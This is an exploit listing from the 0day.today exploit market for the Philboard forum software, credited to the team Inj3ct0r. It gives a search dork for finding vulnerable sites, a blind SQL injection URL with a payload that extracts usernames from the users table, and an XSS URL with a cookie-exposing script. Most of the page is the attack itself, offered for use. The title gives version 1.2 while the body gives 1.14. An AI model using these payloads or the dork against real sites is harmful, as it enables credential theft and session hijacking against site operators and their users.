[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3313
Category
web applications
Date add
26-06-2008
Platform
unsorted
====================================================================
W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities
====================================================================




> [+] Script Name     : philboard v 1.14 Multiple Remote Exploits

> |+| Team            : Inj3ct0r

> [+] Dork            : Powered by v1.14 powered by philboard v1.14

> --//-->

> [+] Expl0iT :

> Remote SQL Injection :

> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]

> Blind Way  : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00

> Remote XSS Exploit :

> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]

[XSS] --> <script>alert(document.cookie)</script>



#  0day.today [2024-12-25]  #